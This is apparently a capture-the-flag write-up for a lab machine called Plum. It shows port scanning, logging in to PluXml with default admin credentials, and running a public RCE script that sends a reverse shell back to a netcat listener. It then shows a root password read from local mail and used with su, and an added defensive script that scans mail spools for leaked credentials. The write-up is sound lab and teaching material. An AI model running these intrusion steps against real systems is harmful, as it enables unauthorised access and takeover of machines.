# Plum

`pluXML` `exim` `smtp` `mail`

* Machine name: Plum
* Difficulty: Intermediate
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 10:57 EDT
Nmap scan report for 192.168.208.28
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

The site runs the PluXml CMS. At the bottom of the page there is a link to an admin login page. admin:admin works.

The version number is displayed on the page.

## Initial access

{% embed url="https://github.com/erlaplante/pluxml-rce" %}

```
┌──(kali㉿kali)-[~/oscp]
└─$ python script.py http://192.168.208.28 admin admin 192.168.45.224 1234 
[+] Attempting login...
[+] Successfully logged in as: admin
[+] Attempting to modify template...
[+] Attemtping to save template...
[+] Check your listener...
```

```
┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.28] 50906
bash: cannot set terminal process group (720): Inappropriate ioctl for device
bash: no job control in this shell
www-data@plum:/var/www/html$ whoami
whoami
www-data
```

## Privilege escalation

```
www-data@plum:/var/www$ netstat -ant
netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN     
tcp        0     13 192.168.208.28:47238    192.168.45.224:1234     ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:25                  :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 192.168.208.28:80       192.168.45.224:49078    ESTABLISHED
```

Port 25 is listening on localhost only, and we have seen that Exim is running on the machine.

Let's look at the contents of the local mail. It can be found in:

* /var/spool/exim4/
* /var/log/exim4/
* /var/mail/
* /var/spool/mail/

```
www-data@plum:/var/www/html$ cat /var/mail/www-data
cat /var/mail/www-data
From root@localhost Fri Aug 25 06:31:47 2023
Return-path: <root@localhost>
Envelope-to: www-data@localhost
Delivery-date: Fri, 25 Aug 2023 06:31:47 -0400
Received: from root by localhost with local (Exim 4.94.2)
	(envelope-from <root@localhost>)
	id 1qZU6V-0000El-Pw
	for www-data@localhost; Fri, 25 Aug 2023 06:31:47 -0400
To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator
```
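As an added example (not part of the original writeup), here is a small defender-side audit script that reads an mbox spool such as the files listed above with Python's standard `mailbox` module and flags messages whose body carries a bare `account:secret` line like the one in the mail just shown. The sample spool and its placeholder password are constructed, and the secret itself is never copied into the report.

```python
import mailbox
import os
import re
import tempfile

# Constructed sample spool (not the lab's real /var/mail/www-data): one message
# handing out a password in clear, one routine cron notification.
SAMPLE_MBOX = """From root@localhost Fri Aug 25 06:31:47 2023
From: root@localhost
Subject: URGENT - maintenance

Here are the credentials for the root user:
root:ExamplePassw0rd-PLACEHOLDER

From cron@localhost Sat Aug 26 01:00:00 2023
From: cron@localhost
Subject: Cron <www-data@plum> /usr/bin/true

(no output)
"""

# A bare "account:secret" line with no spaces, the shape found in the lab's mail.
CRED_LINE = re.compile(r"^([a-z_][a-z0-9_-]{0,31}):(\S{8,})$")


def scan_mbox(path):
    """One finding per message with a credential-like body line; the secret is left out."""
    findings, box = [], mailbox.mbox(path)
    try:
        for msg in box:
            # Local Exim delivery is single-part text; a multipart body yields b"" here.
            body = (msg.get_payload(decode=True) or b"").decode("utf-8", "replace")
            for line in body.splitlines():
                m = CRED_LINE.match(line.strip())
                if m:
                    findings.append({"from": msg["From"], "subject": msg["Subject"],
                                     "user": m.group(1)})
                    break
    finally:
        box.close()
    return findings


def scan_text(mbox_text):
    """Write an mbox string to a temporary file and scan it (handy for testing)."""
    fd, path = tempfile.mkstemp(suffix=".mbox")
    with os.fdopen(fd, "w", newline="\n") as fh:
        fh.write(mbox_text)
    try:
        return scan_mbox(path)
    finally:
        os.unlink(path)
```

Run it over the real spool with `scan_mbox("/var/mail/www-data")`; any finding is a reason to rotate that account's password and stop sending credentials by mail.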

```
www-data@plum:/var/www/html$ su root
su root
Password: 6s8kaZZNaZZYBMfh2YEW
whoami
root
```
